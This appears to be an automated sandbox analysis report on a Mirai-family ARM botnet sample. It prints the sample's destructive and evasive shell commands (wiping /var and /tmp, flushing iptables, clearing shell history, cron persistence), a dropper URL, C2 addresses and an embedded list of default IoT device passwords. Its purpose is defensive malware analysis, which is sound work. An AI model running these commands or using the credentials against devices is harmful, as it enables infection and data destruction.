Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
arm7.elf

Overview

General Information

Sample name:arm7.elf
Analysis ID:1526773
MD5:c385a6903bce7de281b461464b9defa1
SHA1:3a122e2033afa11b6ab684f3e66fe3ba49ae2cfa
SHA256:85e15cc2fe331c89500ea2f7308b8006e5aa2745394ba915f1b369fbe5001d2a
Tags:user-elfdigest
Infos:

Detection

Mirai
Score:84
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Executes the "iptables" command to insert, remove and/or manipulate rules
Manipulation of devices in /dev
Sample deletes itself
Sample tries to persist itself using cron
Tries to stop the "iptables" service
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "iptables" command used for managing IP filtering and manipulation
Executes the "kill" or "pkill" command typically used to terminate processes
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads CPU information from /sys indicative of miner or evasive malware
Reads system information from the proc file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample listens on a socket
Sample tries to set the executable flag
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes crontab like entries to files to /var or /etc typically for achieving persistence
Writes shell script file to disk with an unusual file extension

Classification

General Information

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1526773
Start date and time:2024-10-06 15:51:06 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 1s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm7.elf
Detection:MAL
Classification:mal84.troj.evad.linELF@0/2@35/0

Runtime Messages

Command:/tmp/arm7.elf
PID:5433
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
The Octopus Caught You
Standard Error:Failed to stop iptables.service: Unit iptables.service not loaded.
Failed to stop firewall.service: Unit firewall.service not loaded.
/bin/sh: 1: history: not found
/bin/sh: 1: history: not found

Process Tree

  • system is lnxubuntu20
  • arm7.elf (PID: 5433, Parent: 5354, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm7.elf
    • arm7.elf New Fork (PID: 5435, Parent: 5433)
    • sh (PID: 5435, Parent: 5433, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp"
      • sh New Fork (PID: 5437, Parent: 5435)
      • rm (PID: 5437, Parent: 5435, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/arm7.elf /tmp/config-err-IN1GlB /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap-private-tmp /tmp/snap.lxd /tmp/ssh-ntFb5z3TQVeu /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-ModemManager.service-rehHTg /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-PB7Ovf /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-rnzw4f /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-switcheroo-control.service-jxKacf /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-WfFmsi /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-resolved.service-9mYjrg /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-timedated.service-Ylvv8i /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-upower.service-VKEayg /tmp/vmware-root_727-4290690966 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-ModemManager.service-rJRv0g /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-2NWDdf /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-WNhjUf /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-switcheroo-control.service-YlFEtg /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-VhFl6g /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-resolved.service-GDC7pj /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-timedated.service-NgTmVe /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-upower.service-FqJmSi /var/log/wtmp
    • arm7.elf New Fork (PID: 5441, Parent: 5433)
    • sh (PID: 5441, Parent: 5433, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "rm -rf /tmp/*"
      • sh New Fork (PID: 5443, Parent: 5441)
      • rm (PID: 5443, Parent: 5441, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/*
    • arm7.elf New Fork (PID: 5444, Parent: 5433)
    • sh (PID: 5444, Parent: 5433, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -F"
      • sh New Fork (PID: 5446, Parent: 5444)
      • iptables (PID: 5446, Parent: 5444, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F
    • arm7.elf New Fork (PID: 5450, Parent: 5433)
    • sh (PID: 5450, Parent: 5433, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "pkill -9 busybox"
      • sh New Fork (PID: 5452, Parent: 5450)
      • pkill (PID: 5452, Parent: 5450, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 busybox
    • arm7.elf New Fork (PID: 5464, Parent: 5433)
    • sh (PID: 5464, Parent: 5433, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "pkill -9 perl"
      • sh New Fork (PID: 5466, Parent: 5464)
      • pkill (PID: 5466, Parent: 5464, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 perl
    • arm7.elf New Fork (PID: 5469, Parent: 5433)
    • sh (PID: 5469, Parent: 5433, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "pkill -9 python"
      • sh New Fork (PID: 5471, Parent: 5469)
      • pkill (PID: 5471, Parent: 5469, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 python
    • arm7.elf New Fork (PID: 5472, Parent: 5433)
    • sh (PID: 5472, Parent: 5433, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "service iptables stop"
      • sh New Fork (PID: 5474, Parent: 5472)
      • service (PID: 5474, Parent: 5472, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service iptables stop
        • service New Fork (PID: 5475, Parent: 5474)
        • basename (PID: 5475, Parent: 5474, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5476, Parent: 5474)
        • basename (PID: 5476, Parent: 5474, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5477, Parent: 5474)
        • systemctl (PID: 5477, Parent: 5474, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
        • service New Fork (PID: 5478, Parent: 5474)
          • service New Fork (PID: 5479, Parent: 5478)
          • systemctl (PID: 5479, Parent: 5478, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
          • service New Fork (PID: 5480, Parent: 5478)
          • sed (PID: 5480, Parent: 5478, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
      • systemctl (PID: 5474, Parent: 5472, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl stop iptables.service
    • arm7.elf New Fork (PID: 5482, Parent: 5433)
    • sh (PID: 5482, Parent: 5433, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -F; /sbin/iptables -X"
      • sh New Fork (PID: 5484, Parent: 5482)
      • iptables (PID: 5484, Parent: 5482, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -F
      • sh New Fork (PID: 5485, Parent: 5482)
      • iptables (PID: 5485, Parent: 5482, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -X
    • arm7.elf New Fork (PID: 5486, Parent: 5433)
    • sh (PID: 5486, Parent: 5433, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "service firewall stop"
      • sh New Fork (PID: 5488, Parent: 5486)
      • service (PID: 5488, Parent: 5486, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service firewall stop
        • service New Fork (PID: 5489, Parent: 5488)
        • basename (PID: 5489, Parent: 5488, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5490, Parent: 5488)
        • basename (PID: 5490, Parent: 5488, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5491, Parent: 5488)
        • systemctl (PID: 5491, Parent: 5488, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
        • service New Fork (PID: 5492, Parent: 5488)
          • service New Fork (PID: 5493, Parent: 5492)
          • systemctl (PID: 5493, Parent: 5492, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
          • service New Fork (PID: 5494, Parent: 5492)
          • sed (PID: 5494, Parent: 5492, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
      • systemctl (PID: 5488, Parent: 5486, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl stop firewall.service
    • arm7.elf New Fork (PID: 5517, Parent: 5433)
    • sh (PID: 5517, Parent: 5433, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "history -c"
    • arm7.elf New Fork (PID: 5519, Parent: 5433)
    • sh (PID: 5519, Parent: 5433, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "rm -rf ~/.bash_history"
      • sh New Fork (PID: 5521, Parent: 5519)
      • rm (PID: 5521, Parent: 5519, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /root/.bash_history
    • arm7.elf New Fork (PID: 5522, Parent: 5433)
    • sh (PID: 5522, Parent: 5433, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "history -w"
    • arm7.elf New Fork (PID: 5524, Parent: 5433)
      • arm7.elf New Fork (PID: 5526, Parent: 5524)
      • arm7.elf New Fork (PID: 5528, Parent: 5524)
      • arm7.elf New Fork (PID: 5529, Parent: 5524)
        • arm7.elf New Fork (PID: 5532, Parent: 5529)
        • sh (PID: 5532, Parent: 5529, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "chmod +x /dev/ocmount"
          • sh New Fork (PID: 5534, Parent: 5532)
          • chmod (PID: 5534, Parent: 5532, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /dev/ocmount
        • arm7.elf New Fork (PID: 5535, Parent: 5529)
        • sh (PID: 5535, Parent: 5529, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh"
        • arm7.elf New Fork (PID: 5537, Parent: 5529)
        • sh (PID: 5537, Parent: 5529, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c /dev/ocmount
          • sh New Fork (PID: 5539, Parent: 5537)
        • arm7.elf New Fork (PID: 5589, Parent: 5529)
          • arm7.elf New Fork (PID: 5592, Parent: 5589)
          • sh (PID: 5592, Parent: 5589, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
            • sh New Fork (PID: 5621, Parent: 5592)
            • iptables (PID: 5621, Parent: 5592, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
          • arm7.elf New Fork (PID: 5639, Parent: 5589)
          • sh (PID: 5639, Parent: 5589, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
            • sh New Fork (PID: 5642, Parent: 5639)
            • busybox (PID: 5642, Parent: 5639, MD5: 70584dffe9cb0309eb22ba78aa54bcdc) Arguments: /bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
          • arm7.elf New Fork (PID: 5645, Parent: 5589)
          • sh (PID: 5645, Parent: 5589, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
            • sh New Fork (PID: 5650, Parent: 5645)
          • arm7.elf New Fork (PID: 5652, Parent: 5589)
          • sh (PID: 5652, Parent: 5589, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
            • sh New Fork (PID: 5657, Parent: 5652)
          • arm7.elf New Fork (PID: 5658, Parent: 5589)
          • sh (PID: 5658, Parent: 5589, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
            • sh New Fork (PID: 5660, Parent: 5658)
            • busybox (PID: 5660, Parent: 5658, MD5: 70584dffe9cb0309eb22ba78aa54bcdc) Arguments: busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
        • arm7.elf New Fork (PID: 5590, Parent: 5529)
        • arm7.elf New Fork (PID: 5595, Parent: 5529)
          • arm7.elf New Fork (PID: 5597, Parent: 5595)
      • arm7.elf New Fork (PID: 5545, Parent: 5524)
        • arm7.elf New Fork (PID: 5548, Parent: 5545)
        • sh (PID: 5548, Parent: 5545, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
          • sh New Fork (PID: 5576, Parent: 5548)
          • iptables (PID: 5576, Parent: 5548, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
        • arm7.elf New Fork (PID: 5637, Parent: 5545)
        • sh (PID: 5637, Parent: 5545, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
          • sh New Fork (PID: 5641, Parent: 5637)
          • busybox (PID: 5641, Parent: 5637, MD5: 70584dffe9cb0309eb22ba78aa54bcdc) Arguments: /bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
        • arm7.elf New Fork (PID: 5643, Parent: 5545)
        • sh (PID: 5643, Parent: 5545, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
          • sh New Fork (PID: 5647, Parent: 5643)
        • arm7.elf New Fork (PID: 5648, Parent: 5545)
        • sh (PID: 5648, Parent: 5545, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
          • sh New Fork (PID: 5651, Parent: 5648)
        • arm7.elf New Fork (PID: 5654, Parent: 5545)
        • sh (PID: 5654, Parent: 5545, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
          • sh New Fork (PID: 5656, Parent: 5654)
          • busybox (PID: 5656, Parent: 5654, MD5: 70584dffe9cb0309eb22ba78aa54bcdc) Arguments: busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
      • arm7.elf New Fork (PID: 5546, Parent: 5524)
      • arm7.elf New Fork (PID: 5551, Parent: 5524)
        • arm7.elf New Fork (PID: 5553, Parent: 5551)
  • udisksd New Fork (PID: 5564, Parent: 802)
  • dumpe2fs (PID: 5564, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/sda2
  • udisksd New Fork (PID: 5609, Parent: 802)
  • dumpe2fs (PID: 5609, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/sda2
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
arm7.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    5433.1.00007fcc80017000.00007fcc8003d000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      5589.1.00007fcc80017000.00007fcc8003d000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: arm7.elfAvira: detected
        Multi AV Scanner detection for submitted file
        Source: arm7.elfReversingLabs: Detection: 50%
        Source: arm7.elfVirustotal: Detection: 38%Perma Link
        Source: /usr/bin/pkill (PID: 5452)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
        Source: /usr/bin/pkill (PID: 5466)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior

        Networking

        barindex
        Executes the "iptables" command to insert, remove and/or manipulate rules
        Source: /bin/sh (PID: 5621)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
        Source: /bin/sh (PID: 5576)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
        Tries to stop the "iptables" service
        Source: /usr/sbin/service (PID: 5474)Systemctl executable stopping iptables: /usr/sbin/systemctl -> systemctl stop iptables.serviceJump to behavior
        Source: /usr/sbin/service (PID: 5474)Systemctl executable stopping iptables: /usr/bin/systemctl -> systemctl stop iptables.serviceJump to behavior
        Source: global trafficTCP traffic: 192.168.2.13:40720 -> 212.118.43.167:2222
        Source: global trafficTCP traffic: 192.168.2.13:43652 -> 156.238.224.214:8443
        Source: /bin/sh (PID: 5446)Iptables executable: /usr/sbin/iptables -> iptables -FJump to behavior
        Source: /bin/sh (PID: 5484)Iptables executable: /sbin/iptables -> /sbin/iptables -FJump to behavior
        Source: /bin/sh (PID: 5485)Iptables executable: /sbin/iptables -> /sbin/iptables -XJump to behavior
        Source: /bin/sh (PID: 5621)Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
        Source: /bin/sh (PID: 5576)Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
        Source: /tmp/arm7.elf (PID: 5433)Socket: 127.0.0.1:8013Jump to behavior
        Source: /tmp/arm7.elf (PID: 5545)Socket: 0.0.0.0:31337Jump to behavior
        Source: global trafficTCP traffic: 192.168.2.13:48202 -> 185.125.190.26:443
        Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
        Source: unknownTCP traffic detected without corresponding DNS query: 212.118.43.167
        Source: unknownTCP traffic detected without corresponding DNS query: 212.118.43.167
        Source: unknownTCP traffic detected without corresponding DNS query: 212.118.43.167
        Source: unknownTCP traffic detected without corresponding DNS query: 212.118.43.167
        Source: unknownTCP traffic detected without corresponding DNS query: 185.125.190.26
        Source: unknownTCP traffic detected without corresponding DNS query: 212.118.43.167
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 51.77.149.139
        Source: unknownUDP traffic detected without corresponding DNS query: 194.36.144.87
        Source: unknownUDP traffic detected without corresponding DNS query: 134.195.4.2
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
        Source: global trafficDNS traffic detected: DNS query: octopus1337.geek
        Source: arm7.elfString found in binary or memory: http://Change_ip/octopus_re.sh;chmod
        Source: unknownNetwork traffic detected: HTTP traffic on port 48202 -> 443
        Source: Initial sampleString containing 'busybox' found: pkill -9 busybox
        Source: Initial sampleString containing 'busybox' found: armrm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmprm -rf /tmp/*iptables -Fpkill -9 busyboxpkill -9 perlpkill -9 pythonservice iptables stop/sbin/iptables -F; /sbin/iptables -Xservice firewall stophistory -crm -rf ~/.bash_historyhistory -w0.0.0.0
        Source: Initial sampleString containing 'busybox' found: /bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
        Source: Initial sampleString containing 'busybox' found: busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
        Source: Initial sampleString containing 'busybox' found: systemctl daemon-reload;systemctl enable nginnx.service;systemctl start nginnx.service;sh -c systemctl daemon-reload;systemctl enable nginnxsshd%x/dev/watchdog/dev/misc/watchdogwatchdogrootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedbinvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetciscosetsockoptbindlisten1.1.1.1hi im here, i think/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPTbusybox iptables -
        Source: classification engineClassification label: mal84.troj.evad.linELF@0/2@35/0

        Data Obfuscation

        barindex
        Manipulation of devices in /dev
        Source: /tmp/arm7.elf (PID: 5529)Written: /dev/ocmountJump to behavior

        Persistence and Installation Behavior

        barindex
        Executes the "iptables" command to insert, remove and/or manipulate rules
        Source: /bin/sh (PID: 5621)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
        Source: /bin/sh (PID: 5576)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
        Sample tries to persist itself using cron
        Source: /bin/sh (PID: 5535)File: /etc/cron.d/mount.shJump to behavior
        Tries to stop the "iptables" service
        Source: /usr/sbin/service (PID: 5474)Systemctl executable stopping iptables: /usr/sbin/systemctl -> systemctl stop iptables.serviceJump to behavior
        Source: /usr/sbin/service (PID: 5474)Systemctl executable stopping iptables: /usr/bin/systemctl -> systemctl stop iptables.serviceJump to behavior
        Source: /usr/bin/rm (PID: 5437)Directory: /var/lib/php/..Jump to behavior
        Source: /usr/bin/rm (PID: 5437)Directory: /var/lib/gdm3/.cacheJump to behavior
        Source: /usr/bin/rm (PID: 5437)Directory: /var/lib/gdm3/.cacheJump to behavior
        Source: /usr/bin/rm (PID: 5437)Directory: /var/lib/gdm3/.configJump to behavior
        Source: /usr/bin/rm (PID: 5437)Directory: /var/lib/gdm3/.configJump to behavior
        Source: /usr/bin/rm (PID: 5437)Directory: /var/lib/gdm3/.localJump to behavior
        Source: /usr/bin/rm (PID: 5437)Directory: /var/lib/gdm3/.localJump to behavior
        Source: /usr/bin/rm (PID: 5437)Directory: /var/lib/snapd/assertions/asserts-v0/..Jump to behavior
        Source: /usr/bin/rm (PID: 5437)Directory: /var/lib/snapd/assertions/..Jump to behavior
        Source: /usr/bin/rm (PID: 5437)Directory: /var/lib/snapd/..Jump to behavior
        Source: /usr/bin/rm (PID: 5437)Directory: /var/lib/colord/.cacheJump to behavior
        Source: /usr/bin/rm (PID: 5437)Directory: /var/lib/systemd/deb-systemd-helper-enabled/.wantsJump to behavior
        Source: /usr/bin/rm (PID: 5437)Directory: /var/lib/systemd/deb-systemd-helper-enabled/.wantsJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/230/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/230/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/110/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/110/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/231/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/231/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/111/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/111/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/232/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/232/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/112/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/112/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/233/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/233/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5471)File opened: /proc/113/statusJump to behavior
